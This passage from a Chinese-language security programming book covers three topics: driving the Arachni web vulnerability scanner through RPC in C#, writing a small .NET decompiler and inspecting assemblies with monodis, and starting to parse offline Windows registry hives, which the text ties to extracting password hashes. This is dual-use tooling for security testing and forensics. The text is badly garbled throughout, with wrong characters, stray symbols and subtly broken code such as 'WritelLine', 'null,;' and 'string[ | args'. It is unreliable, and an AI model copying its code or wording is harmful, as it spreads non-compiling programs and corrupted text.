扫描 的 URL 地 址 字符 串 。 第 二 个 参数 是 可 选 的 ， 其 默认 设置 为 执行 所 有 检查 (比如 XSS、SQL 注 入 以 及 路 径 遍 历 等 ) ， 但 是 如 果 
用 户 想 要 在 传递 给 StartScan () 方法 的 选项 中 指定 不 同 的 检查 ， 那 么 它 也 可 以 改变 。 利 用 传递 给 StartScan () 方法 
的 “urI|” 和 “checks” 参数 ， 以 及 Arachni 软 件 用 于 确定 友 送 消息 时 具体 执行 哪 种 类 型 扫描 过 程 的 “audit” 值 ， 我 们 能 够 实例 
化 一 个 新 的 字典 对 象 ， 从 而 构建 一 个 友 送 给 Arachni 软 件 的 新 消息 。 最 后 ， 我 们 使 用 “service.scan ”命令 @ 帮 送 该 消息 ， 并 向 


调用 万 返回 啊 应 信息 。 


GetProgress () 方法 @ 只 需要 一 个 可 选 参 数 : Arachni 软 件 用 于 识别 所 报告 问题 的 整数 列表 。 下 一 节 将 重点 讨论 Arachni 软 
件 如 何 报告 问题 。 利 用 该 参数 ， 我 们 可 以 构建 一 个 小 型 的 字典 对 象 ， 并 将 其 传递 给 “service.progress” 命 令 @@， 设 命令 将 返回 
扫 摘 过 程 的 当前 进程 和 状态 。 我 们 将 该 命令 上 友 送 给 Arachni 软 件 ， 之 后 为 调用 方 返 回 结果 。 


一 个 重要 的 方法 lsBusy () @ 人 简单 地 千 知 我 们 当前 扫 摘 器 是 人 否 正 在 进行 一 次 扫 摘 过程 。 最 后 ， 我 们 使 用 Dispose () 万 法 @ 
来 清理 现场 。 


12.5 “整合 代码 


现在 ,我 们 已 经 拥有 了 用 于 驱动 Arachni 软 件 的 RPC 服 务 对 一 个 URL 地 址 进行 扫 摘 并 实时 汇报 扫描 结果 的 构建 模块 。 清 单 12- 
16 的 代码 显示 了 我 们 如 何 将 所 有 部 分 组 合 到 一 起 ， 来 使 用 RPC 服 务 对 一 个 URL 地 址 进行 扫 摘 。 


清单 12-16: 使 用 RPC 服 务 类 驱动 Arachni 软 件 


public static void Main(string[ | args) 
{ 
Using (ArachniRPCSession session = new @ArachniRPCSession("127.0.0.1", 
7331, true)) 
{ 


using (ArachniRPCManager manager = new ArachniRPCManager(session)) 
Console.@WritelLine("Using instance: ”+ session.InstanceName); 
manager.StartScan("http://demo.testfire.net/default.aspx" ); 
bool isRunning = manager.IsBusy().AsBoolean(); 
List<uint> issues = new List<uint>(); 
DateTime start = DateTime.Now; 
Console.WritelLine("Starting scan at ”+ start.ToLongTimeString()); 
@while (isRunning) 


Thread.Sleep(10000); 

var progress = manager.GetProgress(issues); 

foreach (MessagePackObject p in 
progress.AsDictionary()["issues"|.AsEnumerable()) 

{ 


MessagePackObjectDictionary dict = p.AsDictionary(); 
Console.@WritelLine("Issue found: ”+ dict["name"|].AsString()); 
issues.Add(dict["digest"|].AsUInt32()); 


} 


isRunning = manager.©@IsBusy().AsBoolean(); 


} 


DateTime end = DateTime.Now; 
©@Console.WritelLine("Finishing scan at ”+ end.ToLongTimeString() + 
". Scan took " + ((end - start).ToString()) + "."); 
} 


} 
} 


在 Main () 方法 的 开头 创建 一 个 新 的 ArachniRPCSession 类 对 象 @@， 向 Arachni 软 件 的 调度 程序 传递 主机 及 端口 ， 同 时 将 


第 三 个 参数 设置 为 “true” 来 目 动 获取 一 个 新 的 扫 摘 过 程 实 例 。 获 取 会 话 和 管理 类 并 连接 到 Arachni 软 件 之 后 ， 我 们 打印 当前 实 
例 名 称 @， 这 个 名 称 应 该 是 我 们 创建 扫 摘 过 程 实例 并 连接 它 时 所 生成 的 唯一 ID 号 。 然 后 ， 我 们 通过 向 startscan () 方法 传递 测 
试 URL 地 址 来 开始 扫 摘 过 程 。 


扫描 过 程 开始 之 后 ， 我 们 可 以 监视 它 直 到 结束 ， 然 后 打印 最 终 报 告 。 在 创建 一 些 变量 (比如 用 于 存储 Arachni 软 件 所 反馈 问 
题 的 一 个 空 询 表 ， 以 及 扫 摘 过 程 开始 的 时 间 等 ) 之 后 ， 我 们 开始 一 个 while 循 环 @， 其 终止 条 件 为 isSRunning 变 量 等 
于 “false”。 在 这 个 while 循 环 中 ， 我 们 调用 GetProgress () 方法 来 获取 扫 摘 过 程 的 当前 进程 ; 然后， 打印 @ 并 存储 从 最 后 一 
次 调用 GetProgress () 万 法 开始 到 现在 所 友 现 的 任何 新 问题 。 最 后 ， 我 们 休眠 10 秒 并 再次 调用 lsBusy () 万 法 @@。 然 后 ， 重 新 
开始 该 过 程 直至 扫 摘 结束 。 所 有 工作 完成 之 后 ， 我 们 打印 一 个 关于 扫 摘 所 用 时 长 的 简短 总 结 @@。 如 果 你 将 目 动 化 程序 所 报告 的 漏 
洞 列 表 (我 简单 截取 的 结果 如 清单 12-17 所 示 ) 和 我 们 人 在 本 章 开头 手动 进行 的 原始 Arachni 软 件 扫 摘 结果 放 到 一 起 对 比 观察 ， 会 
及 现 它们 完全 一 致 


清单 12-17: 针对 一 个 示例 URL 地 址 运行 Arachni 软 件 的 C# 闫 进行 扫 摘 并 报告 


$ mono ./ch12 automating arachni.exe 

Using instance: 1892413b-7656-4491-b6c0-05872396b42f 
Starting scan at 8:58:12 AM 

Issue found: Cross-Site Scripting (XSS)@ 
Issue found: Common directory 

Issue found: Backup file®@ 

Issue found: Missing '‘X-Frame-Options' header 
Issue found: Interesting response 

Issue found: Allowed HTTP methods 

Issue found: Interesting response 

Issue found: Path Traversal® 


--S1Ip-- 
因为 我 们 在 运行 Arachni 软 件 时 启用 了 所 有 检查 选项 ， 所 以 该 站 点 将 报告 大 量 的 漏洞 ! 仪 仪 在 大 约 前 10 行 代码 中 ，Arachni 


软件 就 报告 了 一 个 XSS 漏 洞 @， 一 个 包含 潜在 敏感 信息 的 备份 文件 @， 以 及 一 个 路 径 遍历 缺陷 @。 如 果 想 要 将 Arachni 软 件 的 检 
查 选项 限定 为 仅 进行 XSS 漏 洞 扫描 ， 你 可 以 将 传递 给 startScan () 方法 的 第 二 个 参数 设置 为 字符 串 “xss*” (该 参数 的 默认 值 
为 “”， 代 表 “检查 所 有 选项 ”) ， 那 么 Arachni 软 件 将 仅 检 查 并 报告 所 发 现 的 XSS 漏 洞 。 命 令 如 下 列 代 码 行 所 示 : 


manager.StartScan( "http://demo.testfire.net/default.aspx", "xss*"); 


Arachni 软 件 支 持 检查 的 荡 围 很 广 ， 包 括 SQL 以 及 一 般 注 入 ， 因 此 我 建议 你 阅读 一 下 支持 检查 选项 的 相关 文档 。 


12.6 ”本草 小 结 


Arachni 软 件 是 一 蒜 非常 强大 而 通用 的 Web 应 用 程序 扫 摘 器 ， 它 应 该 成 为 任何 专业 安全 工程 师 或 渗透 测试 人 员工 具 箱 中 的 一 
员 。 正 如 在 本 章 中 所 学 到 的 ， 你 可 以 使 用 简单 或 者 复杂 的 方案 ,来 很 轻易 地 驱动 使 用 该 软件 。 如 果 你 只 需要 周期 性 地 扫 摘 一 个 入 
单 的 应 用 程序 ， 那 么 HTTP API 对 你 而 言 可 能 足够 了 ; 然而 ， 如 果 你 总 是 需要 扫 拍 一 些 新 的 不 同 的 应 用 程序 ， 那 么 对 你 来 训 ， 近 
照 意愿 加 速 扫 接 器 的 能 力 可 能 才 是 部 署 扫 摘 过 程 和 避免 瓶颈 的 最 佳 选择 。 


为 了 对 一 次 扫 摘 过 程 进行 开始 、 监 控 和 报告 的 操作 ， 我 们 首先 实现 了 一 系列 与 Arachni 软 件 的 REST API 进 行 交 互 的 简单 类 。 


利用 工具 集中 的 底层 HTTP 库 ， 我 们 能 够 构造 模块 化 的 类 来 驱动 运行 Arachni 软 件 。 


在 结束 了 相对 简单 的 REST APl 学 习 使 用 乙 后 ， 我 们 更 进一步 ， 通 过 MSGPACK RPC 驱 动 使 用 Arachni 软 件 。 利 用 两 个 第 三 
方 的 开源 库 ， 我 们 能 够 驱动 Arachni 软 件 并 使 用 它 更 强大 的 特性 。 我 们 使 用 其 分 布 式 模型 ， 通 过 RPC 服 务 调度 程序 来 创建 新 实 
例 ， 然 后 我 们 对 一 个 URL 地 址 进行 扫描 ， 并 实时 报告 结果 。 


利用 以 上 任意 的 构建 模块 ， 你 可 以 将 Arachni 软 件 与 安全 软件 开 友 生命 周期 (SDLC) 或 持续 集成 系统 相 结 合 ， 以 确保 你 或 
你 的 组 织 所 用 到 的 Web 应 用 程序 的 质量 和 安全 性 。 


第 13 章 ” 反 编 译 和 逆 辐 分 析 托 管 程序 集 


与 Java 语 言 十 分 相似 ，Mono 平 台 和 .NET 平 台 使 用 虚拟 机 来 运行 编译 后 的 可 执行 程序 。.NET 和 Mono 平 台 上 的 可 执行 格式 
使 用 更 高 层次 的 字 节 和 码 ， 而 不 是 本 地 的 x86 或 x86 64 汇编 程序 集 编写 ， 这 种 格式 称 为 托管 程序 集 ; 它 与 类 似 C 和 C++ 语言 所 得 到 
的 本 地 dF 托管 程序 集 不 同 。 因 为 托管 程序 集 使 用 更 高 层次 的 字 证 码 编 写 ， 因 此 如 果 你 使 用 的 库 文件 不 是 标准 库 的 一 部 分 ， 那 么 对 
其 进行 反 编 译 会 非 单 简 音 。 


本 草 将 编写 一 个 简单 的 反 编译 器 ， 它 以 一 个 托管 程序 集 为 输入 ， 疝 一 个 指定 文件 夹 中 输出 源 代 码 。 对 于 有 恶 意 程 序 研究 人 员 、 
逆向 工程 师 ， 或 者 任何 想 要 对 两 个 .NET 库 文件 或 应 用 程序 进行 二 进 制 比 对 (在 字 节 层次 上 ， 对 两 个 编译 后 的 二 进 制 文件 或 库 文 
件 进行 比较 查找 不 同 ) 的 人 来 说 ， 这 是 非常 有 用 的 工具 。 之 后 将 简单 介绍 Mono 平 台 目 市 的 一 个 名 为 “monodis” 的 程序 ， 用 于 
分 析 不 市 源码 的 程序 集 、 潜 人 在 后 门 和 其 他 恶意 代码 。 


13.1 扩编 译 托 官 程序 集 


目前 已 经 存在 大 量 易 用 的 .NET 平 台 反 编译 嚣 ; 然而 ， 它 们 的 用 户 界 面 倾 向 于 使 用 类 似 WPF (Windows 呈 现 基 础 ， 基 于 
Windows 的 用 户 界 面 框架 ) 的 工具 箱 框 架 ， 这 就 使 得 它们 无 法 实现 跨 平台 (大 部 分 只 能 在 Windows 系 统 上 运行 ) 。 很 多 安全 工 
程 师 、 分 析 人 员 以 及 渗透 测试 人 员 都 使 用 Linux 或 OS Xx 系统 ， 因 此 这 些 工具 对 他 们 来 说 并 不 是 很 有 用 。 例 如 ，1LSpy 是 一 款 
Windows 系 统 上 的 优秀 反 编 译 器 ; 它 的 反 编 译 过 程 用 到 了 跨 平 台 的 ICSharpCode.Decompiler 和 Mono.Cecdil 库 ， 但 它 的 用 户 界 
面 使 用 的 是 Windows 系 统 上 特定 的 框架 ， 因 此 它 在 Linux 或 OS X 系 统 上 是 不 可 用 的 。 幸 运 的 是 ， 我 们 可 以 编写 一 个 简单 的 工 
具 ， 它 以 一 个 程序 集 作为 参数 ， 使 用 前 面 所 提 到 的 两 个 开源 库 来 对 一 个 给 定 的 程序 集 进行 反 编译 ， 并 且 能 够 将 得 到 的 源 代码 结果 
写 回 磁盘 以 备 后 续 分 析 。 


这 两 个 库 在 NuGet 工 具 中 都 可 用 。 安 半 过 程 依 赖 于 你 的 IDE 环 境 : 如 果 你 正在 使 用 的 是 Xamarin studio 或 Visual Studio 环 
境 ， 那 么 你 可 以 在 解决 方案 下 每 个 工程 的 解决 方案 浏览 器 中 管理 NuGet 软 件 包 。 清 单 13-1 所 示 的 是 整个 类 的 全 部 细节 ， 并 包括 
了 对 给 定 程序 集 进 行 反 编译 所 需 的 方法 。 


清单 13-1: 简陋 的 C# 反 编译 器 


class MainClass 


public static void @Main(string[ |] args) 


{ 
if (args.Length != 2) 


Console.Error.WritelLine("Dirty C# decompiler requires two arguments."); 
Console.Error.WritelLine("decompiler.exe <¢assembly> <path to directory>"); 
return; 


} 


IEnumerable<AssemblyClass> klasses = @CGenerateAssemblyMethodSource(args[0]); 
@foreach (AssemblyClass klass in klasses) 
{ 
string outdir = Path.Combine(args[1], klass.namespase); 
if (!Directory.Exists(outdir)) 
Directory.CreateDirectory(outdir); 


string path = Path.Combine(outdir, klass.name + ".cs"); 


File.WriteAllText(path, klass.source); 
} 
} 


private static IEnumerable<AssemblyClass> @CGenerateAssemblyMethodSource(string assemblyPath) 
{ 
AssemblyDefinition assemblyDefinition = AssemblyDefinition.@ReadAssembly(assemblyPath, 
new ReaderParameters(ReadingMode.Deferred) { ReadSymbols = true }); 
AstBuilder astBuilder = null,; 
foreach (var defmod in assemblyDefinition.Modules) 


{ 
@foreach (var typeInAssembly in defmod.Types) 


lL 
AssemblyClass klass = new AssemblyClass(); 
klass.name = typelInAssembly.Name; 
klass.namespase = typelnAssembly.Namespace; 
astBuilder = new AstBuilder(new DecompilerContext(assemblyDefinition.MainModule) 
{ CurrentType = typeInAssembly }); 
astBuilder.AddType(typeInAssembly); 


using (StringWriter output = new StringWriter()) 


astBuilder.@CGenerateCode(new PlainTextOutput(output)); 
klass.@source = output.ToString(); 


yield return klass; 


} 
} 
} 
} 


public class AssemblyClass 
{ 


public string namespase; 
public string name; 
public string source; 


} 


清单 13-1 的 代码 十 分 罕 凑 ， 因 此 让 我 们 简单 看 一 下 其 中 的 关键 点 。 在 MainClass 类 中 ， 我 们 首先 创建 了 Main () 方法 @， 
当 我 们 运行 该 程序 时 该 方法 将 目 动 运行 。 它 首先 检查 指定 参数 的 数目 : 如 果 只 指定 了 一 个 参数 ， 则 打印 用 法 并 退出 ， 如 果 应 用 程 


序 中 指定 了 两 个 参数 ， 我 们 假定 第 一 个 参数 是 需要 反 编 译 的 程序 集 路 径 ， 而 第 二 个 参数 是 得 到 的 源 代码 结果 应 该 被 写 入 的 文件 
夹 。 最 后， 我 们 使 用 GenerateAssemblyMethodSource () 方法 来 @ 将 第 一 个 参数 传递 给 应 用 程序 ， 访 方法 将 在 紧 随 
Main () 方法 之 后 实现 。 


人 在 GenerateAssemblyMethodSource () 方法 @ 中 ， 我 们 将 使 用 Mono.Cecil 库 中 的 ReadAssembly () 方法 @ 来 得 到 一 
个 AssemblyDefinition 对 象 ; 基本 上 ， 该 对象 是 Mono.Cecil 库 中 能 够 完整 表示 一 个 程序 集 的 类 ， 并 且 你 可 以 对 其 进行 程序 化 解 
读 分 析 。 在 获取 待 反 编译 程序 集 的 AssemblyDefinition 对 象 之 后 ， 我 们 残 拥 有 了 生成 C# 原 代码 所 需 的 材料 ， 它 在 功能 上 等 价 于 
程序 集中 的 原始 字 忆 码 指令 语句 。 通 过 创建 一 棵 抽 缚 语法 树 (AST) ， 我 们 使 用 Mono.Cecil 库 从 AssemblyDefinition 对 象 中 生 
成 C# 代 码 。 我 不 会 深入 介绍 抽象 语法 树 (有 很 多 专业 教程 专门 介绍 这 个 主题 ) ， 但 应 该 了 解 的 是 ， 一 棵 抽象 语法 树 可 以 摘 述 一 
个 程序 的 每 一 条 可 能 的 代码 路 径 ， 以 及 Mono.Cecil 库 可 被 用 于 生成 一 个 .NET 程 序 的 抽象 语法 树 。 


程序 集中 的 每 一 个 类 都 需要 重复 该 过 程 。 像 清单 13-1 所 示 的 一 般 程 序 集 只 有 一 个 或 两 个 类 ， 但 复杂 的 应 用 程序 可 能 会 有 几 
十 个 或 者 更 多 类 。 对 每 个 类 都 单独 编程 会 很 痛苦 ， 因 此 我 们 创建 了 一 个 foreach 循 环 @ 来 完成 这 项 工作 ; 它 针对 程序 集中 的 每 个 
类 达 代 执行 以 上 这 些 步骤 ， 并 基于 当前 类 信息 创建 一 个 新 的 AssemblyClass 对 象 (该 类 将 在 
GenerateAssemblyMethodSource () 万 法 之 后 定义 ) 。 


这 里 需要 注意 的 部 分 是 ， 实 际 上 GenerateCode () 方法 @ 利 用 我 们 所 创建 的 抽象 语法 树 承 担 了 整个 程序 的 大 部 分 繁重 工 
作 ， 它 为 我 们 提供 了 程序 集中 类 的 C# 源 代码 表达 内 容 。 然 后 ， 我 们 使 用 生成 的 C# 源 代码 为 AssemblyClass 对 象 的 “source” 域 
成 员 @ 赋 值 ， 同 样 也 用 类 的 名 称 和 命名 空间 为 相应 成 员 赋 值 。 当 所 有 都 完成 时 ， 我 们 同 GenerateAssemblyMethodSource () 
方法 的 调用 方 (在 本 例 中 ， 即 为 Main () 方法 ) 返回 类 及 其 源 代 码 的 列表 。 在 对 GenerateAssemblyMethodSource () 方法 
所 返回 ®® 的 每 个 类 进行 迭代 循环 处 理 的 过 程 中 ， 我 们 针对 每 个 类 创建 一 个 新 文件 ， 并 将 该 类 的 源 代码 写 入 该 文件 。 通 过 在 
GenerateAssemblyMethodSource () 方法 中 使 用 “yield” 关 键 字 @， 我 们 在 foreach 循 环 达 代 过 程 @ 中 ， 以 一 次 返回 一 个 而 
不 是 返回 所 有 类 的 完整 列表 的 方式 ， 来 返回 每 个 类 ， 然 后 对 其 进行 处 理 ; 对 于 有 很 多 个 类 要 处 理 的 二 进 制 文件 来 说 ， 这 样 做 能 够 
提供 很 好 的 性 能 提升 。 


13.2 ”测试 反 编译 器 

让 我 们 先 编写 一 个 “Hello World” 样式 的 应 用 程序 对 上 述 反 编译 器 进行 测试 。 使 用 清单 13-2 中 的 代码 创建 一 个 新 工程 ， 然 
后 对 其 进行 编译 。 

清单 13-2: 反 编 译 前 的 简单 “Hello World” 应 用 程序 


using System; 
namespace hello world 


{ 
class MainClass 
{ 
public static void Main(string[ | args) 
{ 
Console.WriteLine("Hello World!"); 
Console.WriteLine(2 + 2); 
} 
} 


} 


在 编译 该 工程 之 后 ， 我 们 对 其 使 用 新 反 编译 器 ， 并 查看 输出 结果 ， 如 清单 13-3 所 示 。 
清单 13-3: 反 编 译 得 到 的 “Hello World” 程序 源 代码 


$ ./decompiler.exe ~/projects/hello world/bin/Debug/hello world.exe hello world 
$ cat hello world/hello world/MainClass.cs 
using Systenm; 


namespace hello world 


{ 
internal class MainClass 
{ 
public static void Main(string[] args) 
{ 
Console.WritelLine("Hello World!"); 
Console.WTiteLine(@4); 
} 
} 
} 


两 者 非常 接近 ! 唯一 的 实际 差别 是 第 二 个 WriteLine () 万 法 调用 。 在 原始 代码 中 ， 我 们 用 的 是 “2+2”， 但 反 编 译 版 本 中 
输出 的 是 4 四 。 这 不 成 问题 ; 在 编译 阶段 ， 任 何 求 得 一 个 单 量 值 的 语句 在 二 进 制 文件 中 都 会 被 音量 值 所 代替 ， 因 此 在 程序 集 
中 “2+2” 写 成 了 4 一 一 处 理 程序 集 时 需要 记 住 这 些 ， 从 而 进行 大 量 匹配 以 得 到 既定 的 结 


13.3 ”使 用 monodis 工 具 分 析 程 序 集 


假设 在 进行 反 编译 之 前 ， 我 们 想 要 对 恶意 二 进 制 文件 先进 行 简单 的 分 析 ; Mono 平 台 自 带 的 monodis 工 具 为 我 们 提供 了 很 多 
这 方面 的 功能 。 它 有 很 多 特定 的 strings 类 型 的 选项 (strings 是 一 种 Unix 系 统 的 通用 类 型 ， 可 以 打印 出 给 定 文件 中 找到 的 任何 人 
类 可 读 字母 组 成 的 字符 串 ) ， 可 以 列 出 并 导出 编译 到 程序 集中 的 资源 ， 比 如 配置 文件 或 私 钥 。monodis 工 具 的 用 法 输出 信息 可 
能 比较 星 涩 而 难于 阅读 ， 如 清单 13-4 所 示 (尽管 使 用 “man” 命令 查询 到 的 相关 页 面 会 稍微 好 一 些 ) 。 


清单 13-4: monodis 工 具 的 用 法 输出 信息 


$ monodis 

monodis -- Mono Common Intermediate Language Disassembler 

Usage is: monodis [--output=filename| [--filter=filename] [--help] [--mscorlib| 
[--assembly|] [--assemblyref] [--classlayout| 

[--constant|] [--customattr] [--declsec| [--event] [--exported| 

[--fields] [--file]j [--genericpar|] [--interface|] [--manifest] 

[--marshal|] [--memberref|] [--method|] [--methodimpl| [--methodsem] 

[ --methodspec] [--moduleref|] [--module| [--mresources] [--presources| 


[--nested] [--param|] [--parconst] [--property|] [--propertymap | 

[--typedef] [--typeref|] [--typespec| [--implmap| [--fieldrval 
[--standalonesig] [--methodptr|] [--fieldptr] [--paramptr|] [--eventptr| 
[--propertyptr| [--blob| [--strings| [--userstrings| [--forward-decls| file .. 


不 市 参数 直接 运行 monodis 工 具 将 打印 显示 程序 集中 以 通用 中 间 语 言 (CIL) 字 节 码 编 写 的 整个 有 反 汇编 代码 列表 ， 或 者 将 反 


汇编 代码 直接 输出 到 一 个 文件 中 。 清 单 13-5 显 示 了 ICSharpCode.Decompiler.dll 程 序 集中 的 部 分 肥 江 编 输出 结果 ， 可 以 看 出 它 
与 一 个 本 地 编译 的 应 用 程序 中 所 用 的 x86 汇 编 语言 代码 非 营 类 似 。 


清单 13-5: ICSharpCode.Decompiler.dll 中 的 部 分 反 汇 编 代 码 


$ monodis ICSharpCode.Decompiler.dl1 | tail -n30 | head -ni10 

IL O00c: mul 

IL 000d: call class [mscorlib|System.Collections.CGeneric.EqualityComparer 1<!0> class 
[mscorlib]System.Collections.Generic.EqualityComparer 1<!'<expr>j TPar'>::get Default() 

IL 0012: ldarg.0 

IL 0013: ldfld !o class ‘<>f AnonymousType5 2 <!0,!1>::' <expr>i Field 

IL 0018: callvirt instance int32 class [mscorlib|System.Collections.Generic.Equality 
Comparer 1<!'<expr>]j TPar'>::GetHashCode(!0) 

IL 001d: add 

IL 001e: stloc.0 

IL 001f: ldc.i4 -1521134295 

IL 0024: ldloc.0 

IL 0025: mul 


这 个 结果 很 不 错 ， 但 是 如 果 你 不 理解 所 看 的 内 容 ， 那 么 它 对 你 来 说 就 没什么 帮助 。 需 要 注意 的 是 ， 输 出 代码 看 起 来 和 x86; 
编 语言 很 类 似 ; 实际 上 ， 它 是 一 种 类 似 于 JAR 文 件 中 的 Java 字 书 码 的 原始 中 间 层 语言 (IL) ， 阅 读 起 来 有 些 星 深 难 懂 。 你 会 友 
现 ， 在 对 一 个 二 进 制 文件 的 两 个 版 本 进行 比 对 并 检查 改动 时 这 些 代码 最 有 用 。 


monodis 工 具 还 有 其 他 一 些 很 棒 的 特性 用 于 辅助 逆向 工程 分 析 。 比 如 ， 你 可 以 对 一 个 程序 集运 行 GNU strings 查 看 工具 ， 来 
检查 程序 集中 存储 了 哪些 字符 串 ， 但 你 通常 会 陷入 预料 之 外 的 烦琐 信息 中 ， 比 如 只 是 碰巧 属于 可 打印 的 AsCll 字 符 的 随机 字 节 序 
列 ; 另 一 方面 ， 如 果 你 将 “--userstrings” 参数 传递 给 monodis 工 具 ， 它 将 打印 所 有 存储 以 便 代码 使 用 的 字符 串 ， 比 如 变量 赋 
值 或 常量 (如 清单 13-6 所 示 ) 。 由 于 monodis 工 具 事 实 上 是 对 程序 集 进行 解析 以 确定 哪些 字符 串 是 由 程序 所 定义 的 ， 因 此 它 能 
够 以 更 高 的 信 噪 比 来 得 到 更 为 清晰 的 结 


清单 13-6: 使 用 “--userstrings” 参数 运行 onodis 工 具 


$ monodis --userstrings ~/projects/hello world/bin/Debug/hello world.exe 
User Strings heap contents 

00: 

01: “Hello World! 

UO 

$ 


你 也 可 以 将 “--userstrings” 参 数 与 “--strings” 参 数 (用 于 元 数据 和 其 他 项 ) 结合 使 用 ， 这 样 操作 将 输出 程序 集中 存储 的 
所 有 字符 串 ， 它 们 与 GNU strings 查 看 工具 找到 的 随机 垃圾 信息 不 同 。 这 种 用 法 非常 有 助 于 寻找 硬 编码 存储 于 程序 集中 的 加 密 口 
令 或 认证 凭证 。 


然而 ，monodis 工 具 的 参数 标志 中 我 最 喜欢 的 是 “--manifest” 和 “--mresources”。 第 一 个 “--manifest” 参 数 用 于 列 
举 程序 集中 的 所 有 内 符 资 源 ; 它们 通常 是 图 片 或 配置 文件 ， 但 有 时 候 可 以 从 中 找到 私 钥 和 其 他 敏感 信息 。 第 二 个 参数 “-- 
mresources” 用 于 将 每 个 内 肉 资 源 保 行 到 当前 工作 目录 中 。 实 际 示例 如 清单 13-7 所 示 。 


清单 13-7: 使 用 monodis 工 具 将 一 个 内 髓 资源 保生 到 文件 系统 中 


$ monodis --manifest ~/projects/hello world/bin/Debug/hello world.exe 
Manifestresource Table (1..1) 

1: public ‘hello world.til neo.png at offset 0 in current module 

$ monodis --mresources “~/projects/hello world/bin/Debug/hello world.exe 

$ file hello world.til neo.png 

hello world.til neo.png: PNG image data, 1440 x 948, 8-bit/color RCGBA, non-interlaced 
$ 


很 明显 ， 有 人 将 一 张 尼 奥 的 照片 藏 到 了 我 的 “Hello World” 应 用 程序 中 ! 毫 无 疑问 ， 当 对 一 个 未 知 程序 集 进行 深入 分 析 ， 
并 且 想 要 获取 它 的 更 多 一 些 信息 (比如 二 进 制 文件 中 的 方法 或 特定 字符 串 等 ) 时 ，monodis 工 具 是 我 的 首选 。 


最 后 ， 让 我 们 了 解 一 下 monodis 工 具 最 有 用 的 参数 之 一 一 一 “--method”， 它 的 用 途 是 列举 二 进 制 文 件 或 库 文件 中 所 有 方 
法 及 其 可 用 参数 (示例 详 见 清单 13-8) 。 


清单 13-8: monodis 工 具 “--method” 参 数 的 用 法 演示 


$ monodis --method ch1 hello world.exe 

Method Table (1..2) 

社 间 ## 术 ####### ch1 hello world.MainClass 

1: @instance default void '.ctor' () (param: 1 impl flags: cil managed ) 
2: @default void Main (string[| args) (param: 1 impl] flags: cil managed ) 


当 对 第 1 章 中 的 “Hello World” 程 序 运行 “monodis--method” 命 令 时 ， 你 将 看 到 monodis 工 具 打印 了 两 行 方法 信息 。 
第 一 行 @ 是 MainClass 类 的 构造 器 ， 它 包含 了 第 二 行 中 的 Main () 方法 @。 因 此 ， 该 参数 不 仅 列 举 所 有 的 方法 (以 及 这 些 方法 
属于 哪个 类 ) ， 而 且 还 能 打印 显示 类 构造 器 ! 这 个 结果 使 我 们 能 够 深入 了 解 一 个 程序 是 如 何 运行 的 ;方法 名 称 通常 能 够 很 好 地 摘 
述 程序 的 内 部 运行 机 制 。 


13.4 ”本 童 小 结 


在 本 草 的 开头 ,我 们 讨论 了 如 何 利用 ICSharpCode.Decompiler 和 Mono.Cedil 两 个 开源 库 ， 来 将 任意 一 个 程序 集 反 编译 得 
到 C# 代 码 。 通 过 编译 一 个 “Hello World” 小 应 用 程序 ， 我 们 可 以 看 到 从 反 编 译 程 序 集中 得 到 的 代码 与 原始 源 文件 中 的 代码 存在 
一 个 不 同 之 处 ; 其 他 的 不 同 也 可 能 友 生 ， 比 如 关键 字 “var” 将 被 所 创建 对 象 的 实际 类 型 所 取代 。 然 而 ， 即 使 所 生成 的 代码 与 之 
前 编写 的 源 代码 并 不 完全 相同 ， 它 仍然 是 功能 等 价 的 。 


之 后 ,我 们 使 用 monodis 工 具 ， 来 学 习 如 何 深入 分 析 程 序 集 ， 进 而 从 流 记 软 件 中 获取 比 在 其 他 方面 轻易 得 到 的 更 多 的 信 
恩 。 平 运 的 是 ， 当 友 生 错误 或 友 现 新 的 恶意 程序 时 ， 这 些 工具 能 够 有 效 减 少 从 “ 友 生 了 什么 “到 “如 何 修复 ” ”所 历经 的 时 
间 。 


第 14 草 ” 读 取 融 线 注册 表 项 


Windows NT 系统 的 注册 表 是 一 个 存储 有 用 数据 信息 (比如 补丁 级 别 和 口令 散 列 值 ) 的 宝库 。 这 些 信息 不 仅 对 于 试图 渗透 
攻击 网 络 的 攻击 方 有 用 ， 而 且 对 事件 响应 或 信息 安全 数据 取证 领域 的 任何 工作 人 员 来 说 也 是 很 有 用 的 。 


比如 ， 上 级 交 给 你 一 块 已 被 攻破 的 电脑 硬盘 ， 并 且 要 求 你 找 出 事件 根源 。 你 会 怎么 做 ? 不 管 Windows 系 统 是 否 能 够 运行 ， 
从 硬盘 中 读 取 关键 信息 都 是 必须 要 做 的 。Windows 系 统 的 注册 表 被 称 为 “注册 表 革 ”， 它 其 实 是 硬盘 上 的 一 个 文件 集合 ;以 你 
的 方式 对 其 进行 学 习 ， 能 够 使 你 更 好 地 利用 语 含 如 此 众多 有 用 信息 的 注册 表 项 。 注 册 表 项 也 是 学 习 解 析 二 进 制 文件 格式 的 恨 好 途 
径 ， 这 些 格式 的 设计 是 为 了 计算 机 能 够 高 效 地 存储 数据 ， 而 不 考虑 人 类 能 否 很 好 地 理解 。 


本 章 将 讨论 Windows NT 系统 的 注册 表 项 数据 结构 ， 并 且 编 写 一 个 小 型 库 ， 其 中 有 一 些 用 于 读 取 脱 机 表 项 的 类 ， 从 中 我 们 
可 以 提取 有 用 信息 (比如 启动 密 钥 ) 。 如 果 你 随后 想 要 从 注册 表 中 提取 口令 散 列 值 ， 以 上 信息 将 非常 有 用 。 


14.1 ”注册 表 项 结构 


从 高 层次 来 看 ， 注 册 表 项 是 一 棵 由 节点 组 成 的 树 ; 每 个 节点 可 能 有 若干 个 键 / 值 对 ， 还 可 能 有 子 节 点 。 我 们 将 使 用 术语 “ 节 
点 键 ” 和 “ 值 键 ”来 区 分 注册 表 项 中 两 种 类 型 的 数据 ， 并 为 两 种 键 创 建 相应 的 类 。 节 点 键 包 合 关 于 树 结构 及 其 子 健 的 信息 ， 而 值 
键 保 仓 了 应 用 程序 所 访问 的 数值 信息 。 和 直观 上 来 说 ， 树 如 图 14-1 所 示 。 


每 一 个 节点 键 都 附加 存储 了 一 些 特定 的 元 数据 ， 比 如 其 值 键 的 最 新 修改 时 间 以 及 其 他 的 系统 层 信息 。 所 有 这 些 数据 的 高 效 存 
储 是 为 了 方便 计算 机 读 取 ， 而 不 是 针对 人 类 。 在 实现 库 时 ， 我 们 将 跳 过 其 中 某 些 元 数据 以 便 简 化 最 终结 果 ， 但 我 会 在 学 习 期 间 指 
出 这 些 实例 . 


Foo 


Baz: true 
Bat: AHA 


BarBuzz 


图 14-1 ”一 棵 带 有 节点 、 键 和 值 的 简单 注册 表 树 的 直观 表示 


